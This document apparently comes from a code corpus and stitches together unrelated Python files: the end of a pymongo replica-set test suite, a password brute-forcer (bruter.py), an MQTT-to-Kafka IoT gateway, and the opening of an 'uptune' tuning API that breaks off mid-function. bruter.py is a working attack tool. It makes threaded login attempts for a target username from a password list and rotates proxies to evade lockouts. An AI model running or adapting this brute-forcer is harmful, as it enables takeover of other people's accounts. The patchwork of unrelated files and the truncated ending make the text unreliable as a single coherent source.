self.assertRaises(ConfigurationError, ReplicaSetConnection,
pair, replicaSet='fdlksjfdslkjfd')
self.assertTrue(ReplicaSetConnection(pair, replicaSet=self.name))
def test_repr(self):
connection = self._get_connection()
self.assertEqual(repr(connection),
"ReplicaSetConnection(%r)" % (["%s:%d" % n
for n in
self.hosts],))
def test_properties(self):
c = ReplicaSetConnection(pair, replicaSet=self.name)
c.admin.command('ping')
self.assertEqual(c.primary, self.primary)
self.assertEqual(c.hosts, self.hosts)
self.assertEqual(c.arbiters, self.arbiters)
self.assertEqual(c.max_pool_size, 10)
self.assertEqual(c.document_class, dict)
self.assertEqual(c.tz_aware, False)
# Make sure RSC's properties are copied to Database and Collection
for obj in c, c.pymongo_test, c.pymongo_test.test:
self.assertEqual(obj.read_preference, ReadPreference.PRIMARY)
self.assertEqual(obj.tag_sets, [{}])
self.assertEqual(obj.secondary_acceptable_latency_ms, 15)
self.assertEqual(obj.slave_okay, False)
self.assertEqual(obj.safe, False)
cursor = c.pymongo_test.test.find()
self.assertEqual(
ReadPreference.PRIMARY, cursor._Cursor__read_preference)
self.assertEqual([{}], cursor._Cursor__tag_sets)
self.assertEqual(15, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
c.close()
tag_sets = [{'dc': 'la', 'rack': '2'}, {'foo': 'bar'}]
c = ReplicaSetConnection(pair, replicaSet=self.name, max_pool_size=25,
document_class=SON, tz_aware=True,
slaveOk=False, safe=True,
read_preference=ReadPreference.SECONDARY,
tag_sets=copy.deepcopy(tag_sets),
secondary_acceptable_latency_ms=77)
c.admin.command('ping')
self.assertEqual(c.primary, self.primary)
self.assertEqual(c.hosts, self.hosts)
self.assertEqual(c.arbiters, self.arbiters)
self.assertEqual(c.max_pool_size, 25)
self.assertEqual(c.document_class, SON)
self.assertEqual(c.tz_aware, True)
for obj in c, c.pymongo_test, c.pymongo_test.test:
self.assertEqual(obj.read_preference, ReadPreference.SECONDARY)
self.assertEqual(obj.tag_sets, tag_sets)
self.assertEqual(obj.secondary_acceptable_latency_ms, 77)
self.assertEqual(obj.slave_okay, False)
self.assertEqual(obj.safe, True)
cursor = c.pymongo_test.test.find()
self.assertEqual(
ReadPreference.SECONDARY, cursor._Cursor__read_preference)
self.assertEqual(tag_sets, cursor._Cursor__tag_sets)
self.assertEqual(77, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
cursor = c.pymongo_test.test.find(
read_preference=ReadPreference.NEAREST,
tag_sets=[{'dc':'ny'}, {}],
secondary_acceptable_latency_ms=123)
self.assertEqual(
ReadPreference.NEAREST, cursor._Cursor__read_preference)
self.assertEqual([{'dc':'ny'}, {}], cursor._Cursor__tag_sets)
self.assertEqual(123, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
if version.at_least(c, (1, 7, 4)):
self.assertEqual(c.max_bson_size, 16777216)
else:
self.assertEqual(c.max_bson_size, 4194304)
c.close()
def test_get_db(self):
connection = self._get_connection()
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, connection, "")
self.assertRaises(InvalidName, make_db, connection, "te$t")
self.assertRaises(InvalidName, make_db, connection, "te.t")
self.assertRaises(InvalidName, make_db, connection, "te\\t")
self.assertRaises(InvalidName, make_db, connection, "te/t")
self.assertRaises(InvalidName, make_db, connection, "te st")
self.assertTrue(isinstance(connection.test, Database))
self.assertEqual(connection.test, connection["test"])
self.assertEqual(connection.test, Database(connection, "test"))
connection.close()
def test_auto_reconnect_exception_when_read_preference_is_secondary(self):
c = self._get_connection()
db = c.pymongo_test
def raise_socket_error(*args, **kwargs):
raise socket.error
old_sendall = socket.socket.sendall
socket.socket.sendall = raise_socket_error
try:
cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
self.assertRaises(AutoReconnect, cursor.next)
finally:
socket.socket.sendall = old_sendall
def test_operations(self):
c = self._get_connection()
# Check explicitly for a case we've commonly hit in tests:
# a replica set is started with a tiny oplog, a previous
# test does a big insert that leaves the secondaries
# permanently "RECOVERING", and our insert(w=self.w) hangs
# forever.
rs_status = c.admin.command('replSetGetStatus')
members = rs_status['members']
self.assertFalse(
[m for m in members if m['stateStr'] == 'RECOVERING'],
"Replica set is recovering, try a larger oplogSize next time"
)
db = c.pymongo_test
db.test.remove({}, safe=True)
self.assertEqual(0, db.test.count())
db.test.insert({'foo': 'x'}, safe=True, w=self.w, wtimeout=10000)
self.assertEqual(1, db.test.count())
cursor = db.test.find()
doc = cursor.next()
self.assertEqual('x', doc['foo'])
# Ensure we read from the primary
self.assertEqual(c.primary, cursor._Cursor__connection_id)
cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
doc = cursor.next()
self.assertEqual('x', doc['foo'])
# Ensure we didn't read from the primary
self.assertTrue(cursor._Cursor__connection_id in c.secondaries)
self.assertEqual(1, db.test.count())
db.test.remove({}, safe=True)
self.assertEqual(0, db.test.count())
db.test.drop()
c.close()
def test_database_names(self):
connection = self._get_connection()
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
connection.close()
def test_drop_database(self):
connection = self._get_connection()
self.assertRaises(TypeError, connection.drop_database, 5)
self.assertRaises(TypeError, connection.drop_database, None)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database("pymongo_test")
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database(connection.pymongo_test)
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.close()
def test_copy_db(self):
c = self._get_connection()
self.assertTrue(c.in_request())
self.assertRaises(TypeError, c.copy_database, 4, "foo")
self.assertRaises(TypeError, c.copy_database, "foo", 4)
self.assertRaises(InvalidName, c.copy_database, "foo", "$foo")
c.pymongo_test.test.drop()
c.drop_database("pymongo_test1")
c.drop_database("pymongo_test2")
c.pymongo_test.test.insert({"foo": "bar"})
self.assertFalse("pymongo_test1" in c.database_names())
self.assertFalse("pymongo_test2" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1")
# copy_database() didn't accidentally end the request
self.assertTrue(c.in_request())
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.end_request()
self.assertFalse(c.in_request())
c.copy_database("pymongo_test", "pymongo_test2", pair)
# copy_database() didn't accidentally restart the request
self.assertFalse(c.in_request())
time.sleep(1)
self.assertTrue("pymongo_test2" in c.database_names())
self.assertEqual("bar", c.pymongo_test2.test.find_one()["foo"])
if version.at_least(c, (1, 3, 3, 1)):
c.drop_database("pymongo_test1")
c.pymongo_test.add_user("mike", "password")
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="foo", password="bar")
self.assertFalse("pymongo_test1" in c.database_names())
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="mike", password="bar")
self.assertFalse("pymongo_test1" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1",
username="mike", password="password")
self.assertTrue("pymongo_test1" in c.database_names())
time.sleep(2)
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.close()
def test_iteration(self):
connection = self._get_connection()
def iterate():
[a for a in connection]
self.assertRaises(TypeError, iterate)
connection.close()
def test_disconnect(self):
c = self._get_connection()
coll = c.foo.bar
c.disconnect()
c.disconnect()
coll.count()
c.disconnect()
c.disconnect()
coll.count()
def test_fork(self):
"""Test using a connection before and after a fork.
"""
if sys.platform == "win32":
raise SkipTest("Can't fork on Windows")
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest("No multiprocessing module")
db = self._get_connection().pymongo_test
# Failure occurs if the connection is used before the fork
db.test.find_one()
#db.connection.end_request()
def loop(pipe):
while True:
try:
db.test.insert({"a": "b"}, safe=True)
for _ in db.test.find():
pass
except:
traceback.print_exc()
pipe.send(True)
os._exit(1)
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
# recv will only have data if the subprocess failed
try:
cp1.recv()
self.fail()
except EOFError:
pass
try:
cp2.recv()
self.fail()
except EOFError:
pass
db.connection.close()
def test_document_class(self):
c = self._get_connection()
db = c.pymongo_test
db.test.insert({"x": 1})
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.close()
c = self._get_connection(document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.close()
def test_network_timeout(self):
no_timeout = self._get_connection()
timeout_sec = 1
timeout = self._get_connection(socketTimeoutMS=timeout_sec*1000)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert({"x": 1}, safe=True)
# A $where clause that takes a second longer than the timeout
where_func = delay(1 + timeout_sec)
def get_x(db):
doc = db.test.find().where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(ConnectionFailure, get_x, timeout.pymongo_test)
def get_x_timeout(db, t):
doc = db.test.find(network_timeout=t).where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x_timeout(timeout.pymongo_test, None))
self.assertRaises(ConnectionFailure, get_x_timeout,
no_timeout.pymongo_test, 0.1)
no_timeout.close()
timeout.close()
def test_tz_aware(self):
self.assertRaises(ConfigurationError, ReplicaSetConnection,
tz_aware='foo', replicaSet=self.name)
aware = self._get_connection(tz_aware=True)
naive = self._get_connection()
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert({"x": now}, safe=True)
time.sleep(1)
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
def test_ipv6(self):
try:
connection = ReplicaSetConnection("[::1]:%d" % (port,),
replicaSet=self.name)
except:
# Either mongod was started without --ipv6
# or the OS doesn't support it (or both).
raise SkipTest("No IPv6")
# Try a few simple things
connection = ReplicaSetConnection("mongodb://[::1]:%d" % (port,),
replicaSet=self.name)
connection = ReplicaSetConnection("mongodb://[::1]:%d/?safe=true;"
"replicaSet=%s" % (port, self.name))
connection = ReplicaSetConnection("[::1]:%d,localhost:"
"%d" % (port, port),
replicaSet=self.name)
connection = ReplicaSetConnection("localhost:%d,[::1]:"
"%d" % (port, port),
replicaSet=self.name)
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_bernie.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
connection.close()
def _test_kill_cursor_explicit(self, read_pref):
c = self._get_connection(read_preference=read_pref)
db = c.pymongo_test
db.drop_collection("test")
test = db.test
test.insert([{"i": i} for i in range(20)], w=1 + len(c.secondaries))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
cursor.next()
self.assertNotEqual(0, cursor.cursor_id)
connection_id = cursor._Cursor__connection_id
writer = c._ReplicaSetConnection__writer
if read_pref == ReadPreference.PRIMARY:
msg = "Expected cursor's connection_id to be %s, got %s" % (
writer, connection_id)
self.assertEqual(connection_id, writer, msg)
else:
self.assertNotEqual(connection_id, writer,
"Expected cursor's connection_id not to be primary")
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_kill_cursor_explicit_primary(self):
self._test_kill_cursor_explicit(ReadPreference.PRIMARY)
def test_kill_cursor_explicit_secondary(self):
self._test_kill_cursor_explicit(ReadPreference.SECONDARY)
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure Connection closes its
# socket if it gets an interrupt while waiting to recv() from it.
c = self._get_connection()
db = c.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert({'_id': 1}, safe=True)
old_signal_handler = None
try:
# Platform-specific hacks for raising a KeyboardInterrupt on the main
# thread while find() is in-progress: On Windows, SIGALRM is unavailable
# so we use second thread. In our Bamboo setup on Linux, the thread
# technique causes an error in the test at sock.recv():
# TypeError: 'int' object is not callable
# We don't know what causes this in Bamboo, so we hack around it.
if sys.platform == 'win32':
def interrupter():
time.sleep(0.25)
# Raises KeyboardInterrupt in the main thread
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
else:
# Convert SIGALRM to SIGINT -- it's hard to schedule a SIGINT for one
# second in the future, but easy to schedule SIGALRM.
def sigalarm(num, frame):
raise KeyboardInterrupt
old_signal_handler = signal.signal(signal.SIGALRM, sigalarm)
signal.alarm(1)
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
db.foo.find({'$where': where}).next()
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected ConnectionFailure")
# Raises AssertionError due to PYTHON-294 -- Mongo's response to the
# previous find() is still waiting to be read on the socket, so the
# request id's don't match.
self.assertEqual(
{'_id': 1},
db.foo.find().next()
)
finally:
if old_signal_handler:
signal.signal(signal.SIGALRM, old_signal_handler)
def test_auto_start_request(self):
for bad_horrible_value in (None, 5, 'hi!'):
self.assertRaises(
(TypeError, ConfigurationError),
lambda: self._get_connection(auto_start_request=bad_horrible_value)
)
# auto_start_request should default to True
conn = self._get_connection()
pools = [mongo.pool for mongo in
conn._ReplicaSetConnection__members.values()]
self.assertTrue(conn.auto_start_request)
self.assertTrue(conn.in_request())
# Trigger the RSC to actually start a request
conn.test.test.find_one()
for pool in pools:
self.assertTrue(pool.in_request())
conn.end_request()
self.assertFalse(conn.in_request())
for pool in pools:
self.assertFalse(pool.in_request())
conn.start_request()
self.assertTrue(conn.in_request())
conn.close()
conn = self._get_connection(auto_start_request=False)
self.assertFalse(conn.in_request())
conn.start_request()
self.assertTrue(conn.in_request())
conn.end_request()
self.assertFalse(conn.in_request())
conn.close()
def test_schedule_refresh(self):
# Monitor thread starts waiting for _refresh_interval, 30 seconds
conn = self._get_connection()
# Reconnect if necessary
conn.pymongo_test.test.find_one()
secondaries = conn.secondaries
for secondary in secondaries:
conn._ReplicaSetConnection__members[secondary].up = False
conn._ReplicaSetConnection__members[conn.primary].up = False
# Wake up monitor thread
conn._ReplicaSetConnection__schedule_refresh()
# Refresh interval is 30 seconds; scheduling a refresh tells the
# monitor thread / greenlet to start a refresh now. We still need to
# sleep a few seconds for it to complete.
time.sleep(5)
for secondary in secondaries:
self.assertTrue(conn._ReplicaSetConnection__members[secondary].up,
"ReplicaSetConnection didn't detect secondary is up")
self.assertTrue(conn._ReplicaSetConnection__members[conn.primary].up,
"ReplicaSetConnection didn't detect primary is up")
conn.close()
def test_pinned_member(self):
latency = 1000 * 1000
conn = self._get_connection(
auto_start_request=False, secondary_acceptable_latency_ms=latency)
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
# No pinning since we're not in a request
assertReadFromAll(
self, conn, conn.secondaries,
ReadPreference.SECONDARY, None, latency)
assertReadFromAll(
self, conn, list(conn.secondaries) + [conn.primary],
ReadPreference.NEAREST, None, latency)
conn.start_request()
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
assertReadFrom(self, conn, host, ReadPreference.SECONDARY)
# Repin
primary = read_from_which_host(conn, ReadPreference.PRIMARY)
self.assertEqual(conn.primary, primary)
assertReadFrom(self, conn, primary, ReadPreference.NEAREST)
# Repin again
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
assertReadFrom(self, conn, host, ReadPreference.SECONDARY)
# Unpin
conn.end_request()
assertReadFromAll(
self, conn, list(conn.secondaries) + [conn.primary],
ReadPreference.NEAREST, None, latency)
if __name__ == "__main__":
unittest.main()
|
bruter.py | # Date: 12/28/2018
# Author: Mohamed
# Description: Bruter
import queue
import time
import threading
import typing
from lib.browser import Browser
from lib.display import Display
from lib.proxy_manager import ProxyManager
from lib.password_manager import PasswordManager
from lib.const import max_time_to_wait, max_bots_per_proxy
class Bruter(object):
def __init__(self, username: str, threads: int, passlist_path: str):
self.is_alive = True
self.is_found = False
self.password: str = None
self.username: str = username
self.last_password: str = None
self.bots_per_proxy = 0
self.total_threads: int = threads
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(
username, passlist_path, threads, self.display
)
self.browsers: typing.List[Browser] = []
self.active_passwords: typing.List[str] = []
self.unstarted_browsers: typing.List[Browser] = []
# Locks
self.lock_browsers = threading.RLock()
self.lock_unstarted_browsers = threading.RLock()
self.lock_active_passwords = threading.RLock()
self.lock_password_manager = threading.RLock()
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.password_manager.session.delete()
else:
if self.is_found:
self.password_manager.session.delete()
else:
self.password_manager.session.write(
self.password_manager.attempts,
self.password_manager.passlist,
)
def browser_manager(self):
while self.is_alive:
browsers: typing.List[Browser] = []
with self.lock_browsers:
browsers = [br for br in self.browsers]
for browser in browsers:
if not self.is_alive:
break
if (
Display.account_exists == None
and Browser.account_exists != None
):
Display.account_exists = Browser.account_exists
if not browser.is_active:
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = browser.password
self.is_found = True
with self.lock_password_manager:
self.password_manager.list_remove(browser.password)
self.remove_browser(browser)
else:
if browser.start_time:
if (
time.time() - browser.start_time
>= max_time_to_wait
):
browser.close()
with self.lock_active_passwords:
try:
self.active_passwords.remove(
browser.password
)
except ValueError:
pass
def prune_browsers(self, browser) -> None:
"""Remove all the browsers with the same password as the given browser"""
with self.lock_browsers:
for br in list(self.browsers):
if br == browser:
continue
if br.password != browser.password:
continue
try:
self.browsers.remove(br)
except ValueError:
pass
br.close()
br.proxy.decr_usage()
self.proxy_manager.dispose(br.proxy)
with self.lock_unstarted_browsers:
for br in list(self.unstarted_browsers):
if br.password == browser.password:
try:
self.unstarted_browsers.remove(br)
except ValueError:
pass
def remove_browser(self, browser: Browser) -> None:
self.proxy_manager.dispose(browser.proxy)
with self.lock_browsers:
try:
self.browsers.remove(browser)
except ValueError:
pass
with self.lock_active_passwords:
try:
self.active_passwords.remove(browser.password)
except ValueError:
pass
if browser.is_attempted:
self.prune_browsers(browser)
def attack(self):
attack_started = False
proxy_per_pwd = 3
while self.is_alive:
for pwd in self.password_manager.passlist:
if not self.is_alive:
break
with self.lock_unstarted_browsers:
if len(self.unstarted_browsers) >= self.total_threads:
break
with self.lock_active_passwords:
if pwd in self.active_passwords:
continue
is_added = False
for _ in range(proxy_per_pwd):
with self.lock_unstarted_browsers:
if len(self.unstarted_browsers) >= self.total_threads:
break
proxy = self.proxy_manager.get_proxy()
if not proxy:
continue
with self.lock_unstarted_browsers:
self.unstarted_browsers.append(
Browser(self.username, pwd, proxy)
)
is_added = True
if not is_added:
break
with self.lock_active_passwords:
self.active_passwords.append(pwd)
if not attack_started:
self.display.info("Starting attack...")
attack_started = True
with self.lock_unstarted_browsers:
for br in list(self.unstarted_browsers):
with self.lock_browsers:
if len(self.browsers) >= self.total_threads:
break
else:
self.browsers.append(br)
self.unstarted_browsers.remove(br)
threading.Thread(target=br.attempt, daemon=True).start()
def start_daemon_threads(self):
attack = threading.Thread(target=self.attack)
browser_manager = threading.Thread(target=self.browser_manager)
password_manager = threading.Thread(target=self.password_manager.start)
attack.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
browser_manager.start()
password_manager.start()
self.display.info("Searching for proxies...")
def stop_daemon_threads(self):
self.password_manager.stop()
def start(self):
self.display.info("Initiating daemon threads...")
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if (
last_attempt == self.password_manager.attempts
and self.password_manager.attempts
):
time.sleep(0.65)
continue
browsers = []
with self.lock_browsers:
browsers = [br for br in self.browsers]
for browser in browsers:
self.display.stats(
browser.password,
self.password_manager.attempts,
len(self.browsers),
)
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if (
self.password_manager.is_read
and not self.password_manager.list_size
and not len(self.browsers)
):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.password_manager.session.is_busy = False |
__init__.py | import ast
import datetime
import json
import time
import threading
import socket
import paho.mqtt.client as mqtt
from flask import Flask
from flask import request
from kafka import KafkaProducer
from message.mqtt_message import MqttMessages
from .healthcheck import HealthCheck
from .actuator import Actuator
from .http_codes import http_response_code
from .setup import args
def on_connect(client, userdata, flags, rc):
print("connected to mqtt broker")
def on_subscribe():
print('subscribed')
def on_message(client, userdata, message):
print('messaging')
# give message to kafka as kafka producer
def send_message_to_kafka(msg):
v_topic = msg.topic.split('/')
payload = msg.payload.decode().split(',')
kafka_message = topic_manager.kafka_message(v_topic, payload)
topic_manager.add_node(int(v_topic[1]))
topic_manager.add_sensor(int(v_topic[1]), int(payload[0]))
#if topic_manager.sensor_check(v_topic[1], payload):
if len(topic_manager.get_nodes()) > 0:
'''
if health_check.get_health_check_mode():
if(health_check.set_node_state(v_topic[1], True)):
print("health check: ", v_topic[1], "->True")
else:
print("This node is not healthcheck target: ",v_topic[1])
'''
print("data by mqtt: sending message to kafka : %s" % msg)
print(kafka_message)
producer.send("sensor-data", kafka_message)
producer.flush()
def handle_uplink_command(msg):
v_topic = msg.topic.split('/') #command / uplink / MacCommand / nodeid
if v_topic[2] == 'DevStatusAns':
print('Received DevStatusAns!')
json_msg = json.loads(str(msg.payload.decode()))
health_check.set_node_state(v_topic[3], True, json_msg['battery'])
# callbacks
def data_callback(client, userdata, msg):
return send_message_to_kafka(msg)
def command_callback(client, userdata, msg):
return handle_uplink_command(msg)
# connecting mqtt client to mqtt broker
def mqtt_run():
client.on_connect = on_connect
#client.on_message = on_message
client.on_disconnect = on_disconnect
client.message_callback_add("data/#", data_callback)
client.message_callback_add("command/uplink/#", command_callback)
client.connect(args.b, 1883)
client.loop_start()
client.subscribe("data/#")
client.subscribe("command/uplink/#")
return http_response_code['success200']
def on_disconnect(client, user_data, rc):
print("Disconnected")
client.disconnect()
def health_check_handler():
while(1):
if health_check.get_health_check_mode():
healthcheck_server = '10.5.110.11' #'220.70.2.5'
healthcheck_port = 8085
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Connect to HealthCheck Server...')
client_socket.connect((healthcheck_server, healthcheck_port))
print("Connected to HealthCheck...")
print("healthcheck target: ", topic_manager.get_nodes())
health_check.setup_target_nodelist(topic_manager.get_nodes())
health_check.send_req(client)
time.sleep(health_check.get_time())
print("health_check: Send Json to HealthCheck Server...")
client_socket.sendall(health_check.create_msg())
# start the node webserver
app = Flask(__name__)
producer = KafkaProducer(bootstrap_servers=[args.k+':9092'], api_version=(0,10,2,0), value_serializer=lambda v: json.dumps(v).encode('utf-8'))
topic_manager = MqttMessages()
client = mqtt.Client()
app.debug = False
#app.threaded = True
health_check = HealthCheck()
actuator = Actuator()
mqtt_run()
# create socket and run health_check thread
health_check.set_health_check_mode(True)
th = threading.Thread(target=health_check_handler, args=())
th.start()
# setting interval of the health check time
@app.route('/health-check/set_time/<time>', methods=['GET'])
def health_check_set_time():
health_check.set_time(time)
return http_response_code['success200']
# interval of the health check time
@app.route('/health-check/time', methods=['GET'])
def health_check_get_time():
health_check.get_time()
return http_response_code['success200']
# make the format of the topics from the data which toiot server gave
@app.route('/topics', methods=['POST'])
def response_getMessageFormat():
topic_manager.clear_topics()
temp = json.loads(request.get_data().decode())
topic_manager.get_message_format(temp)
client.subscribe(topic_manager.mqtt_topic)
print(topic_manager.mqtt_topic)
return http_response_code['success200']
# delete sensor
@app.route('/sensor/<node>/<sensor>', methods=['GET', 'DELETE'])
def delete_sensor(sensor):
client.unsubscribe(topic_manager.get_delete_sensor(sensor))
return http_response_code['success200']
# delete arduino board
@app.route('/node/<node>', methods=['GET', 'DELETE'])
def delete_node(node):
client.unsubscribe(topic_manager.get_delete_node(node))
return http_response_code['success200']
# handle actuator
@app.route('/actuator', methods=['GET', 'POST'])
def actuator_command():
json_data = request.get_json(silent=True)
actuator.send_req(client, json_data)
return http_response_code['success200']
# error handlers
@app.errorhandler(400)
def page_bad_request(error):
return http_response_code['error400']
@app.errorhandler(401)
def page_unauthorized(error):
return http_response_code['error401']
@app.errorhandler(403)
def page_forbidden(error):
return http_response_code['error403']
@app.errorhandler(404)
def page_not_found(error):
return http_response_code['error404']
@app.errorhandler(408)
def page_timeout(error):
return http_response_code['error408']
|
api.py | from future.utils import with_metaclass
from multiprocessing.pool import ThreadPool
import datetime
from collections import OrderedDict
import pandas as pd
import numpy as np
import abc, argparse, json, os, ray, logging
import threading, time, subprocess, copy, sys, signal
from uptune.src.template import JinjaParser
from uptune.opentuner.api import TuningRunManager
from uptune.opentuner.measurement import MeasurementInterface
from uptune.opentuner.resultsdb.models import Result
from uptune.opentuner.search.manipulator import ConfigurationManipulator
from uptune.opentuner.search.manipulator import (
IntegerParameter, EnumParameter, PowerOfTwoParameter,
LogIntegerParameter, BooleanParameter, FloatParameter,
PermutationParameter
)
from uptune.plugins.causaldiscovery import notears
from uptune.database.globalmodels import *
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument('--timeout', type=int, default=72000,
help="auto-tuning timeout in seconds")
argparser.add_argument('--runtime-limit', '-rt', type=int, default=7200,
help="kill process if runtime exceeds the time in seconds")
argparser.add_argument('--async-interval', '-it', type=int, default=300,
help="interval in seconds for async scheduler to check the task queue")
argparser.add_argument('--parallel-factor', '-pf', type=int, default=2,
help="number of processes spawned by Parallel Python")
argparser.add_argument('--params', '-params', type=str, default="",
help="search space definition in json")
argparser.add_argument('--learning-models', '-lm', action="append", default=[],
help="single or ensemble of learning models for space pruning")
argparser.add_argument('--training-data', '-td', type=str, default='',
help="path to training data (support csv / txt)")
argparser.add_argument('--offline', action='store_true',
help="enable re-training for multi-stage")
argparser.add_argument('--aws', action='store_true', default=False,
help="use aws s3 storage for publishing")
argparser.add_argument('--cfg', action='store_true', default=False,
help="display configuration on screen")
argparser.add_argument('--gpu-num', type=int, default=0,
help="max number of gpu for each task")
argparser.add_argument('--cpu-num', type=int, default=1,
help="max number of cpu for each task")
log = logging.getLogger(__name__)
def init(apply_best=False): # reset uptune env variables
if not os.getenv("EZTUNING"):
os.environ["UPTUNE"] = "True"
if apply_best: # apply best cfg
os.environ["BEST"] = "True"
# run with the best
def get_best():
assert os.path.isfile("ut.temp/best.json"), \
"best cfg does not exsit"
with open("ut.temp/best.json", "r") as fp:
cfg, res = json.load(fp)
fp.close()
return cfg, res
class ParallelTuning(with_metaclass(abc.ABCMeta, object)):
"""Abstract class for parallel tuning"""
def __init__(self,
cls,
args=None,
node='localhost',
parallel_factor=None):
self.cls = cls # ray actor class
self.args = args # arguments for control
self.parallel = args.parallel_factor # num of parallel instances
self.search_limit = args.test_limit
self.best_qors = list()
self.best_config = None
self.tempdir = "ut.temp"
self.history = "../ut.archive.csv"
self._pending = list() # pending configs being validated
self._prev = False # whether recovering from history
self._valid = False # whether pruning is enabled
self._ratio = 0.3 # pruning score percentage threshold
self._interval = args.async_interval # interval for checking the task pool
self._mapping = dict() # mappin from Enum to Int
self._models = list() # pretrained ML model list
self._apis = list()
self._actors = list()
self._archive = list()
self._glbsession = list()
def init(self):
path = f"{self.tempdir}/uptune.db"
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
if self.args.database == None:
self.args.database = f"sqlite:///{self.tempdir}/global"
# Switch to ut.temp workdir and create symbolic links
def prepare_workdir(self, copy=False):
with open(self.args.params) as f:
self.params = json.load(f)
# If not reusing the parameters JSON
# from last run, then move the params JSON into workdir
if os.path.isfile("ut.params.json"):
os.system("mv ut.*.json ut.temp/")
# Create symbolic links
work_dir = os.getenv("UT_WORK_DIR")
for idx in range(self.parallel):
thread_dir = f"{self.tempdir}/temp.{idx}"
os.system(f"mkdir -p {thread_dir} > /dev/null")
os.chdir(f"{thread_dir}")
for f in os.listdir(work_dir):
if not f.startswith("ut."):
os.system(f"ln -s {work_dir}/{f} .")
os.chdir(work_dir)
os.chdir(self.tempdir)
# ray.init(redis_address="localhost:6379")
ray.init(logging_level=logging.FATAL)
def create_tuning(self, index, stage, manipulator):
args = self.args
args.database = "sqlite:///" + os.path.join('uptune.db',
str(index) + \
'-' + str(stage) + '.db')
